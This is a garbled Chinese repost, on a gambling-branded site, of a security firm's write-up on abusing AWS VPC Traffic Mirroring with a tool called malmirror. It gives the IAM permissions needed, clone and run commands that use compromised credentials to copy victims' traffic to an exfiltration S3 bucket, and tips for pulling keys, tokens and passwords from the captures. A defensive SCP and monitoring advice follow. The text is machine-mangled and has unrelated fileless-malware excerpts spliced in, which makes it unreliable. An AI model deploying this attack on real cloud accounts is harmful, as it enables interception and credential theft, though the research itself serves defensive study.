在 AWS 云环境中滥用 VPC 流量镜像抓取网络流量 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

在 AWS 云环境中滥用 VPC 流量镜像抓取网络流量

申博_安全工具 申博 33次浏览 已收录 0个评论

无文件形式的恶意软件:了解非恶意软件攻击(2)

上篇文章,我们介绍了非恶意软件如何工作?在攻击中使用非文件恶意软件的原因,以及PowerShell,什么是POWERSHELL合法使用?为什么要使用POWERSHELL进行无文件攻击?本篇文章,我们将继续介绍indows管理工具(WMI),以及为什么要使用WMI进行无文件攻击?另外还对.NET框架以及为什么要使用.NET进行无文件攻击都做了介绍。 Windows管理工具(WMI) Windows Management Instrumentation(WMI)是Microsoft标准,用于访问有关企业环境中设备的管理信息。自Windows NT 4.0和Windows 95以来,WMI已深深嵌

云环境下的收集检测题目

人们可以愿望看管云环境中的收集流量有很多缘由——出于进击和防备的目的。 被动的收集搜检在云环境中可以很难题,而且在这之前须要对收集设置举行严重修正,以确保每台主机都被监控,而且不会被歹意用户绕过。 这意味着作为一个进击者,看管全部收集会发作数目难以置信的噪声,而且损坏任何东西也变得异常风险。

关于在云端举行通用收集搜检碰到的难题,渗入测试职员采用了其他更简朴的要领,比方检察 Elastic Load Balancer 接见日记。 这些日记可认为 你供应一些信息,但与周全的收集流量搜检比拟,这些日记内里的信息异常有限。

然则,AWS 最近在本年六月的 re: Inforce 上宣布了一个被动收集检测的新功用,称为“ VPC 流量镜像”。 运用这个新特征,我们建立了一个名为“ malmirror”的剧本,用于布置必要的基本设施来镜像和提取 VPC 流量。

VPC  流量镜像: 一种潜伏的 AWS 收集监测解决方案

VPC  流量镜像是在 VPC 中复制 EC2实例的入站和出站流量,而不须要在实例中装置任何东西。 这些反复的流量平常会被发送到类似于收集入侵防备体系效劳器(IDS)之类的处所举行剖析和监控。

跟着 VPC 流量镜像的宣布,AWS 中的 VPC 收集检测变得越发轻易,不管是打击照样戍守。 如今只须要一些 AWS API 挪用(以及运用这些 API 的必要权限) ,就可以在 AWS VPC 中看管收集流量。

歹意 VPC 流量镜像的影响及其可以性

歹意的 VPC  流量镜像可以发作极大的影响,因为在 VPC  内挪动的收集流量平常包含对进击者有效的敏感信息。 完成歹意的 VPC 流量镜像的可以性也异常高,因为经由历程 VPC 每每有大批的明文流量。 运用明文流量的一个罕见缘由是,在流量镜像之前,流量不太可以被探测到,所以风险不大。

这方面的一个例子是本年1月宣布的一个特征,即用于收集负载平衡的 TLS 停止。 平常的做法是,环境在其负载平衡器处停止 TLS,然后以明文情势将要求传递给后端效劳器。 这意味着在 VPC 中将会有大批的明文流量被我们歹意的 VPC 镜像抓取。 关于负载平衡器的 TLS 停止的更多信息可以在这里找到,关于最好实践的一些议论可以在这里找到。

因为 TLS 对机能的巨大影响,所以很多公司还将在其内部收集中运用明文协定。 之前做这些事变觉得很平安,尤其是晓得传统的中间人进击 或 ARP 诳骗变的不可以发作。

因为这些缘由,我们可以合理地假定,作为进击者,在流量镜像进击时期,我们最少会取得一些明文流量。
运用 AWS 凭据布置歹意镜像
作为一家重要关注进击性研讨的公司,我们愿望将这一历程自动化,以使其可以疾速、简朴和可反复的实行。 因而,出于这个缘由,我们编写了一个看法考证剧本,它将接收 AWS 凭据作为输入参数,并布置必要的基本设施,以便在目的 VPC-malmirror 中最先对一切支撑的 EC2实例举行镜像。 值得注重的是,VPC 流量镜像只支撑由 AWS Nitro 体系驱动的 EC2实例范例,VPC 镜像目的必需与被镜像的任何主机在同一个 VPC 中。
在接下来的几节中,我们将引见 malmirror 的事情道理、它的功用以及怎样剖析提取数据。 这个剧本可以在我们的 GitHub 上找到。
malmirror 是怎样事情的
malmirror 将以下资本布置到一个账户中:

·将流量镜像到的 EC2实例

·该 EC2实例的 EC2平安组

·一个 VPC 镜像目的,指向已建立的 EC2实例

·设置为镜像一切流量的 VPC 镜像过滤器

·在这个帐户中的每一个支撑的 EC2实例的 VPC 镜像会话

在 AWS 云环境中滥用 VPC 流量镜像抓取网络流量

一个简朴的图表演示了在将镜像基本构造布置到一个小型 VPC 中以后,该小型 VPC 中的流量流多是什么样的(请注重,为了简朴起见,该图中遗漏了很多资本)。

在一切都布置终了后,流量将最先镜像到建立好的 EC2实例。 Ec2实例将最先侦听并以 PCAP 花样纪录接收到的一切镜像收集流量。 在实例上当地存储了约莫100mb 的数据以后,它将自动将该数据转移到 你挑选的 S3 存储桶中(可以在 你本身的 AWS 帐户中) ,并从体系中删除当地文件。 如许可以防备实例耗尽磁盘空间,并许可我们以自动的体式格局提取镜像流量。 请注重,100mb 的限定是恣意设置的,关于一些流量较大的收集来讲可以太小了。之所以要以这类体式格局提取流量,是因为好像没有一个简朴的要领来镜像交织帐户的流量,这好像是一个牢靠的体式格局来确保数据转移到外部环境。

因为流量正在被转移到 S3 存储桶中, 你可以在当地下载以便举行剖析。 一个简朴的要领是运用 AWS CLI 供应的 S3“同步”敕令,如许 你只需下载上次与 存储桶同步时丧失的数据。
运用 malmirror 的先决条件
要运用 malmirror,你须要:
一个用于将镜像流量转移到的 S3 存储桶 (这个存储桶可以在你本身的 AWS 账户中)
存储在 AWS CLI 设置文件中的AWS 凭据(可以属于 你本身 AWS 帐户中的用户)。 这个用户应当有接见将 PCAP 文件提取到的 S3 存储桶的 write/s3:PutObject 权限

存储在 AWS CLI 设置文件中的带有以下 IAM 权限 的AWS 凭据(这个凭据是你将镜像布置到的目的帐户) :

·ec2:DescribeInstances

    ·辨认要镜像的 EC2实例

无文件情势的歹意软件:相识非歹意软件进击(一)

与基于文件的攻击不同,无文件恶意软件不会利用传统的可执行文件。无文件攻击滥用了操作系统内置的工具来进行攻击。从本质上讲,Windows是反对自己的。 没有可执行文件,杀毒软件就无法检测到签名,这就是无文件攻击如此危险的原因,因为它们能够轻松逃避防病毒产品。 利用MITRE ATT&CK框架防御这些攻击,MITRE ATT&CK是一款可以加速检测与响应的最新工具(对手战术及技术的公共知识库),引起了业界广泛注意。MITRE ATT&CK深入研究对手行为,安全分析师可利用该信息在网络攻防战中占据

·ec2:RunInstances

    ·建立一个将作为 VPC 镜像目的的 EC2实例

·ec2:CreateSecurityGroup

    ·为我们的 EC2实例建立平安组

·ec2:AuthorizeSecurityGroupIngress

    ·许可入站接见我们的 EC2实例

·ec2:CreateTrafficMirrorTarget

    ·将 EC2实例指定为 VPC 镜像目的

·ec2:CreateTrafficMirrorSession

    ·要为我们想要镜像的每一个 EC2实例建立镜像会话

·ec2:CreateTrafficMirrorFilter

    ·为镜像会话建立流量过滤器

·ec2:CreateTrafficMirrorFilterRule

    ·要指定将一切流量镜像到我们的 EC2实例

运用 malmirror
malmirror 包含两个剧本, deploy-malmirror.py 和 sniff.py。 布置剧本在启动镜像资本时运用嗅探剧本,因而 你永久不须要手动运转 sniff.py。
要最先运用 malmirror 镜像流量,请遵照以下步骤:
1. git 克隆并跳到它地点的目次

git clone https://github.com/RhinoSecurityLabs/Cloud-Security-Research && cd Cloud-Security-Research/AWS/malmirror/

2. (可选的步骤) malmirror 是一个初期的看法考证,因而 你可以须要举行一些修正,使其更适合 你的场景,比方:
修正 VPC 镜像目的的 EC2实例范例
修正文件大小限定,在这个限定下,文件将被提取到 S3 存储桶并在当地删除
将 VPC 镜像目的更改成运用收集负载平衡器
限定或修正镜像目的的平安组划定规矩
将EC2实例范例增加到基于 Nitro 的硬编码列表中
进一步细化 VPC 镜像过滤划定规矩
3. 运转 malmirror,坐下来喝一杯咖啡,稍等片刻

python3 deploy-malmirror.py --profile CompromisedCreds --s3-profile S3Creds --region us-west-2 --bucket bucket-for-exfil

在 AWS 云环境中滥用 VPC 流量镜像抓取网络流量

上图显现了我们的歹意 VPC 镜像基本设施被布置到目的帐户。 注重,这里运用了剧本参数的简写。
4. 当文件最先抵达 S3存储桶时,要下载这些文件(到它们本身的文件夹中) ,但请记着,存储桶将被不停填满,直到你从目的环境中撤除镜像基本架构为止

aws s3 --profile profile-that-owns-the-bucket sync s3://bucket-for-exfil ./

如今 你已在当地具有了一些 PCAP 文件, 你可以剖析和运用它们。
离线流量剖析
将 PCAP 文件同步到当地体系后, 你就可以最先剖析这些文件了。 你会发明有些流量是加密的,有些流量是不加密的。  你可以没法对加密数据做任何事变,然则明文流量有可以致使很多没有效的发明。 要查找的罕见内容包含 API 密钥、身份考证令牌 、cookie、用户名/暗码、 PII/PHI、文件和 IP 地点/主机名。 有数不清的其他事变你可以想要寻觅,但这些东西可以给你一个很好的出发点。
这里有一些东西可以协助我们:

· Wireshark/tshark

·dsniff

·ngrep

不管 你挑选哪一种剖析器,都可以自动同步来自 S3 的 PCAP 文件,并在文件下载时自动剖析历程。 这可以经由历程一个事前设置好的正则表达式或字符串婚配列表来完成,如许可以找到秘要信息,而且关于每一个下载的新文件,找出任何与这些婚配的内容。 因为看起来人们倾向于用他们本身的体式格局举行剖析,所以自动剖析并没有内置到这个东西中。
限定和正告
我们已在全部博客中提到了个中的一些看法,然则在实行这类进击时依旧须要斟酌一些事变。 因为这是一个看法考证剧本,而且此时它还没有经由严厉的测试历程,因而检察这些限定和正告特别是异常重要的。
只要基于 Nitro 的 EC2实例范例才可以对其流量举行镜像(可以查找这个列表)
VPC  中任何具有准确路由的内容都可以向镜像目的 EC2实例发送恣意流量,因为它许可来自一切内部收集局限(10.0.0.0 / 8,172.16.0.0 / 12,192.168.0.0 / 16)的 UDP 端口上的入站流量
因为一切(也只要)内部 IP 局限都是白名单的镜像目的,所以我们将没法镜像运用 VPC 内部收集的非标准 IP 局限的收集中的流量
假如帐户中已布置了镜像基本设施,则 malmirror 可以会失利。 这可以经由历程增加一些错误处理和重试功用来防止

怎样防备这类进击
防备这类进击的第一步是意想到并尝试防备 你的 AWS 环境遭到损坏。 我们之前宣布了一篇博文,引见了 AWS 密钥被攻破的一些罕见体式格局,你可以在这里找到。
假如 你不在 你的帐户中运用 VPC 流量镜像特征,那末 你可以会运用效劳掌握战略(Service Control Policy,SCP)在构造层面谢绝接见必要的权限,以下所示:

{"Version":"2012-10-17","Statement":[{"Sid":"DenyVPCTrafficMirroring","Effect":"Deny","Action":["ec2:CreateTrafficMirrorTarget","ec2:CreateTrafficMirrorSession","ec2:CreateTrafficMirrorFilter","ec2:CreateTrafficMirrorFilterRule","ec2:DeleteTrafficMirrorTarget","ec2:DeleteTrafficMirrorSession","ec2:DeleteTrafficMirrorFilter","ec2:DeleteTrafficMirrorFilterRule","ec2:ModifyTrafficMirrorSession","ec2:ModifyTrafficMirrorFilterNetworkServices","ec2:ModifyTrafficMirrorFilterRule"],"Resource":"*"}]}

这个 SCP 将阻挠任何应用它的帐户运用这些 API,纵然试图如许做的用户和角色在该帐户中具有准确的 IAM 权限。
假如 你确着实 你的环境中运用了 VPC 流量镜像,那末 你应当运用诸如 Amazon EventBridge 之类的东西来严厉看管这些 API 的挪用,以确保新的镜像资本不会被建立,现有的镜像资本不会被修正或删除。 不管是不是运用镜像, 你还可以看管帐户中可疑的 EC2实例的建立。
一定另有其他要领可以检测并防备这类范例的进击,但很多要领是特定于上下文的,而且可以依据环境的设置而有所不同。 作为平常的履历轨则,最好的做法是只管削减在 VPC 中传输明文流量。
总结
VPC  流量镜像使进击者和防备者在他们的 AWS VPC 中更轻易看管收集流量,然则过去的罕见做法已致使在这些收集中传输着大批的明文流量。 这个新功用另有很多可以性须要在 AWS 中探究,所以看看它会带来什么是令人兴奋的。
假如你还没有看过,你可以在我们的 GitHub 上找到 malmirror。
假如 你忧郁 AWS 基本设施的平安性,可以斟酌实行 AWS 渗入测试,以肯定 你的环境中的缺点和破绽。

本文翻译自:https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明在 AWS 云环境中滥用 VPC 流量镜像抓取网络流量
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址